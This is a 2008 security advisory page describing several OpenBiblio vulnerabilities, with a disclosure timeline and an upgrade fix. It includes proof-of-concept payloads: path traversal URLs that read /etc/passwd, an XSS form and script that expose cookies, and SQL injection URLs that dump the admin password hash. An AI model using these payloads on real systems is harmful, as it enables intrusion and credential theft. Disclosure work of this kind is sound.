SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities


Arrow  SecurityAlert : 3502
Arrow  CVE : CVE-2007-6606
Arrow  CVE : CVE-2007-6607
Arrow  CVE : CVE-2007-6608
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : Juan Galiana
Arrow  Published : 01.01.2008

Arrow  Affected Software : OpenBiblio 0.5.2-pre4 and prior



Arrow  Advisory Content :  

- Security Advisory -

- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities -
----------------------------------------------------

Product: OpenBiblio
Version: Version 0.5.2 Prerelease 4 and prior is affected
Url: http://obiblio.sourceforge.net/
Affected by: Full path disclosure, local file include, phpinfo
disclosure, multiple Cross Site Scripting, SQL injection

I. Introduction.

OpenBiblio is an easy to use, automated library system written in PHP
containing OPAC, circulation,
cataloging, and staff administration functionality.
OpenBiblio library administration offers an intuitive interface with
broad category tabs and sidebar.

II. Description

OpenBiblio suffers multiple bugs.

1) Local File Include vulnerability: its posible to include any
arbitrary local file using shared/help.php file

- Code -
if (isset($_GET["page"])) {
$page = $_GET["page"];
} else {
$page = "contents";
}
include("../locale/".OBIB_LOCALE."/help/".$page.".php");

- PoC -
http://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd
%00

2) Local File Include (2) (only works with register_globals On and
for non php files magic_quotes_gpc must be Off)

- Code -
<?php include("../navbars/".$tab.".php");?>

- PoC -
http://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00

3) This link will show phpinfo

http://site/openbiblio/phpinfo.php

Remove it!

4) Path Disclosure

Some samples:

http://site/openbiblio/shared/footer.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/shared/footer.php on line 18

http://site/openbiblio/circ/mbr_fields.php
Fatal error: Call to a member function on a non-object in
/httpdocs/openbiblio/circ/mbr_fields.php on line 14

http://site/openbiblio/admin/custom_marc_form_fields.php
Fatal error: Cannot instantiate non-existent class: dmquery in
/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14

Please, turn display_errors to Off in php.ini

6) Multiple Cross Site Scripting, an attacker can perform an XSS
attack that allows him to access the targeted user cookies

Some samples:

http://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRS
T=[XSS]


http://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS]

In /admin/theme_preview.php an attacker can inject an XSS in the var
themeName with method POST.
here is a poc:

<form action=" http://site/openbiblio/admin/theme_preview.php"
method="post">
<input type="text" name="themeName" size="40" value="<script>alert(
document.cookie);</script>"><br><br>
<input type="submit" value="doit">
</form>

try with: <script>alert(document.cookie);</script>

6) SQL injection (session with report rol is needed to exploit this bug)

Any user with report rol can access any field of the database,
including admin md5 hash.

http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++

with this an attacker can get the md5 admin password:

http://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balance
DueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+fro
m+staff%20where+userid=1%0A++

then click "run report" and view the results, besides, you can choose
between html and csv format ;)

staff.username staff.pwd
admin 21232f297a57a5a743894a0e4a801fc3

III. Timeline

20/08/2006 - Bugs discovered
25/08/2006 - Vendor Contacted
30/08/2006 - Release 0.5.2 (parcial patch)
21/02/2007 - Release 0.6.0 (full patch)
28/12/2007 - Advisory Disclosure

IV. Solution

Upgrade to 0.6.0 from http://obiblio.sourceforge.net/
Good work! :)

V. Credits

Juan Galiana <jgaliana gmail com>

Regards






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.